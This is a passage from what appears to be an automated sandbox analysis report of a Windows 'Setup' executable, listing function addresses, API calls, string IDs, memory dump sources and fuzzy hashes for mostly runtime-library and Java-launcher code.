                                                                                                                                                                                                            • API ID: Messagefwprintf
                                                                                                                                                                                                            • String ID: Java Virtual Machine Launcher
                                                                                                                                                                                                            • API String ID: 1438246221-898708411
                                                                                                                                                                                                            • Opcode ID: 7f12cdf1833f9ca9ebd8898dfd4ec3a12a6f9da31f53ff1fcf5cdf72b08ebb12
                                                                                                                                                                                                            • Instruction ID: 4ab550a9410439cad93026fbfb4f7abfd3422327ae13b2e3f4016774fe8fc3ae
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f12cdf1833f9ca9ebd8898dfd4ec3a12a6f9da31f53ff1fcf5cdf72b08ebb12
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F21C73260864191EB11AF63E895BB9E661AF99BC4FA44139EE4D47792DF3CD1018310
                                                                                                                                                                                                            Function 00007FF764A270F0 Relevance: 4.6, APIs: 3, Instructions: 92fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateDriveFileHandleType_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2907017715-0
                                                                                                                                                                                                            • Opcode ID: a33ca38b42f5ad457585b92045b84c00a2e9d242f388010a2427c9583d10d8ac
                                                                                                                                                                                                            • Instruction ID: f32a296df540e2f6f6766bd4c99d4a63ac83d198d828db0860260b3404449c7f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a33ca38b42f5ad457585b92045b84c00a2e9d242f388010a2427c9583d10d8ac
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91311932D09781D6F610BF269940A6AB650FF457A0F685335EAAC237E1DF3CE2A09750
                                                                                                                                                                                                            Function 00007FF764A1FA58 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                            • Opcode ID: 799936e69fd531bd261ff7b62f03790f280960af208326ac74684e5982d33f97
                                                                                                                                                                                                            • Instruction ID: b9b6457200ebaa9b5f0c1e1385f0fbadd53a3f36987ad36a7f24b0108441cb34
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 799936e69fd531bd261ff7b62f03790f280960af208326ac74684e5982d33f97
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9E01220A05742E2EA957F2299C5A7953676F84701FA0443DD80E43352EE3DA8488220
                                                                                                                                                                                                            Function 00007FF764A1F99C Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3947729631-0
                                                                                                                                                                                                            • Opcode ID: cb96273a2151a35e2a73fd447c71a94cb89efb4fccae3b55bb54ce2bf4947032
                                                                                                                                                                                                            • Instruction ID: 4f95e778842b7dc0726e5c8b8c618f696c136c5d4b0869466e13ec544fee147c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb96273a2151a35e2a73fd447c71a94cb89efb4fccae3b55bb54ce2bf4947032
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5219832E04782EAEB12AF65D4846AD73B1EB4430CFA4443AE60D03A85DF7CC485CBA0

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Function 00007FF764A221D8 Relevance: 45.6, APIs: 23, Strings: 2, Instructions: 1875COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: $
                                                                                                                                                                                                            • API String ID: 2880407647-227171996
                                                                                                                                                                                                            • Opcode ID: 0238494e4185e9e0452f616f036e6ea2473bf2d3c40658a8c9b8098016ed82eb
                                                                                                                                                                                                            • Instruction ID: 3919a56534343ea01773cf634b14cbcbe3b8c97a33c8960e02740e0839e46197
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0238494e4185e9e0452f616f036e6ea2473bf2d3c40658a8c9b8098016ed82eb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7003E772A181C2DBE775DE26D480BFAB791FB8438CF985135DA0A67F44DB38DA009B50
                                                                                                                                                                                                            Function 00007FF764A33A14 Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1209COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                            • API String ID: 808467561-2761157908
                                                                                                                                                                                                            • Opcode ID: b2886f78b3e801e6384d34c3a3f2cd6676a6e4bd5269c4a29a9d638173f13b0c
                                                                                                                                                                                                            • Instruction ID: d639eed2bfe88f8cb4edad1f84d8d3e6e65306abd3aa190cf202bfe84badf104
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2886f78b3e801e6384d34c3a3f2cd6676a6e4bd5269c4a29a9d638173f13b0c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAB20A72E18282DBE7669E66D480BFDB7A1FB44348FA05135DA0D97E84EF39E500CB50
                                                                                                                                                                                                            Function 00007FF764A16728 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 134windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ErrorFormatFreeLastLocalfwprintf
                                                                                                                                                                                                            • String ID: Java Virtual Machine Launcher
                                                                                                                                                                                                            • API String ID: 3630131139-898708411
                                                                                                                                                                                                            • Opcode ID: 34e35c17a90e0a6dac7562f769ba0c42994651291d7eb5778f65e679b0df0a84
                                                                                                                                                                                                            • Instruction ID: 4dbf25007d8ab1258381edad532e3cd9a1b9a0d80457a7e1daa47faaa2e97b26
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34e35c17a90e0a6dac7562f769ba0c42994651291d7eb5778f65e679b0df0a84
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3151B672A08652E6FB21AF62D9C1BBDA6A1BB48798F944535DE4D87781DF3CD4048320
                                                                                                                                                                                                            Function 00007FF764A1AFE4 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                            • Opcode ID: 71317b3d12281315f37eb4e3fb27f7e64a2eda6129d7b25fbb9121efbd05b509
                                                                                                                                                                                                            • Instruction ID: f5de06a54e2e60d0804e4033b77626f59a34baf24a5596d78ac8cb7e452e970d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71317b3d12281315f37eb4e3fb27f7e64a2eda6129d7b25fbb9121efbd05b509
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A315072609B81D5EB61AF61E8807EDB374FB84744F94403ADA4E47B98EF38D648C720
                                                                                                                                                                                                            Function 00007FF764A367A8 Relevance: 9.3, APIs: 6, Instructions: 280timeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 435049134-0
                                                                                                                                                                                                            • Opcode ID: f34aa1144b3a603df1cfe8e3aa768729ab95252bd5a74704b41f9320b8c445da
                                                                                                                                                                                                            • Instruction ID: cbd94d6dfa2a10072458651520061b716a6edce5902be4ea5c63e5d75440b409
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f34aa1144b3a603df1cfe8e3aa768729ab95252bd5a74704b41f9320b8c445da
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44B1D422A08242E6F721FF23D9D09B9E761AF84784FE45135EA0D83785EF3CE4058720
                                                                                                                                                                                                            Function 00007FF764A2B26C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                            • Opcode ID: e58f4378e033707c7bf7f7cf13841d0542599257f0a2f9b68ca8a604657ef5b9
                                                                                                                                                                                                            • Instruction ID: 647e4e44724be479d57cdffcf748c75c4e401789476881cdbcf4a57e3bbc14d9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e58f4378e033707c7bf7f7cf13841d0542599257f0a2f9b68ca8a604657ef5b9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28317432608B81D6E761DF26E8806EEB3A4FB88754FA40135EA8D43B94EF3CD545C710
                                                                                                                                                                                                            Function 00007FF764A17A9C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 129fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,00000000,?,00007FF764A176FD,?,?,?,00007FF764A17A4F,?,?,?,00007FF764A13E00), ref: 00007FF764A17AF0
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,00007FF764A176FD,?,?,?,00007FF764A17A4F,?,?,?,00007FF764A13E00), ref: 00007FF764A17B3B
                                                                                                                                                                                                            • FindClose.KERNEL32(?,00007FF764A176FD,?,?,?,00007FF764A17A4F,?,?,?,00007FF764A13E00), ref: 00007FF764A17C31
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                            • String ID: JAR$jar
                                                                                                                                                                                                            • API String ID: 3541575487-1396542530
                                                                                                                                                                                                            • Opcode ID: 63bb2aedccf3de762e0ee375445767d73e504fb473f02ef78a9200dbea67647a
                                                                                                                                                                                                            • Instruction ID: 03773ea2d748af5f7dbe394d59e19b07776598a779aa0041ce23b2f33b5d9469
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63bb2aedccf3de762e0ee375445767d73e504fb473f02ef78a9200dbea67647a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D51C035A09642E9EA16FF63E8C1AB9E370AB54B90FA48535DE5E47382DF3CE441C310
                                                                                                                                                                                                            Function 00007FF764A2FACC Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1443284424-0
                                                                                                                                                                                                            • Opcode ID: c37a975567a0e8e3df11ed48818854dd4fdb01c810396f3f464756168682b727
                                                                                                                                                                                                            • Instruction ID: 2855b5a9f67ff05228f8b841d3f7edab8e14c316c6f64f173fd8017e85004662
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c37a975567a0e8e3df11ed48818854dd4fdb01c810396f3f464756168682b727
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AE13732B08681EAE701DF66D0805AEB772FB45788FA4413AEF4E67B98DE38D415D710
                                                                                                                                                                                                            Function 00007FF764A36A3C Relevance: 6.1, APIs: 4, Instructions: 149timeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF764A36A6A
                                                                                                                                                                                                              • Part of subcall function 00007FF764A361A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF764A361BC
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF764A36A7B
                                                                                                                                                                                                              • Part of subcall function 00007FF764A36148: _invalid_parameter_noinfo.LIBCMT ref: 00007FF764A3615C
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF764A36A8C
                                                                                                                                                                                                              • Part of subcall function 00007FF764A36178: _invalid_parameter_noinfo.LIBCMT ref: 00007FF764A3618C
                                                                                                                                                                                                              • Part of subcall function 00007FF764A2B560: HeapFree.KERNEL32(?,?,?,00007FF764A327DC,?,?,?,00007FF764A3281F,?,?,00000000,00007FF764A32CE4,?,?,?,00007FF764A32C17), ref: 00007FF764A2B576
                                                                                                                                                                                                              • Part of subcall function 00007FF764A2B560: GetLastError.KERNEL32(?,?,?,00007FF764A327DC,?,?,?,00007FF764A3281F,?,?,00000000,00007FF764A32CE4,?,?,?,00007FF764A32C17), ref: 00007FF764A2B588
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF764A36C98), ref: 00007FF764A36AB3
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3458911817-0
                                                                                                                                                                                                            • Opcode ID: 95cffe678918885c03dd0fd6ad45f7c1867915822390267a51126667de5d843a
                                                                                                                                                                                                            • Instruction ID: 082c187add929869e4a26d970ac5ff21a7636a3124296956a4dbe1ca5f1c159d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95cffe678918885c03dd0fd6ad45f7c1867915822390267a51126667de5d843a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52617332A08642E6E721FF23E9C19A9E760FB48784FE55135EA4D83795EF3CE4058720
                                                                                                                                                                                                            Function 00007FF764A366C4 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 244COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                                                                            • Opcode ID: 51cdd9079e68ce62684cac5115b1afc2b6653c272f767fd36a0a2a5a613cb686
                                                                                                                                                                                                            • Instruction ID: be727db6e7bc3c88ede6b606b3a67faee3138da742d4caa7d84f1a901d2697f8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51cdd9079e68ce62684cac5115b1afc2b6653c272f767fd36a0a2a5a613cb686
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6591F622E08252E6EB31BF27D490B7AA661EB44BD4FA49131EA4C877C5EF3CD4518750
                                                                                                                                                                                                            Function 00007FF764A240E0 Relevance: 4.8, APIs: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memcpy_s
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1502251526-0
                                                                                                                                                                                                            • Opcode ID: e20d760b859cf2c7ba59061aa156bdf6ee08cd8a7917d1d6d4625f58f413215a
                                                                                                                                                                                                            • Instruction ID: 01855673c1f21011f229087015b005b701040e0c3b519247d421faa841b4f830
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e20d760b859cf2c7ba59061aa156bdf6ee08cd8a7917d1d6d4625f58f413215a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2EC1F572B18686D7EB24DF1AE184A6BF791F794788FA88134DB4E57744DA3CE800DB00
                                                                                                                                                                                                            Function 00007FF764A2CDFC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
